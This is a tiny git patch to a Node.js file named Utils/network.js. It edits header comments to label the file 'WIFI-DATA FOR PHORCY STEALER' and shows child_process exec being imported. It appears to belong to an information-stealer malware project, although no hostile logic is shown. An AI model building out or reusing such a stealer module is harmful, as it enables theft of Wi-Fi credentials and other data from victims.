From 37cfe7f32880d202a3880294f7b04e52ebf9f4e7 Mon Sep 17 00:00:00 2001 From: Synthetic <130696187+syntheticlol@users.noreply.github.com> Date: Mon, 13 Nov 2023 21:24:17 -0500 Subject: [PATCH] Update network.js --- Utils/network.js | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/Utils/network.js b/Utils/network.js index 29ec0f5..54dc360 100644 --- a/Utils/network.js +++ b/Utils/network.js @@ -1,4 +1,5 @@ -/// coded by syntheticuhh on discord +/// coded by syntheticuhh +/// WIFI-DATA FOR PHORCY STEALER const util = require('util'); const exec = util.promisify(require('child_process').exec);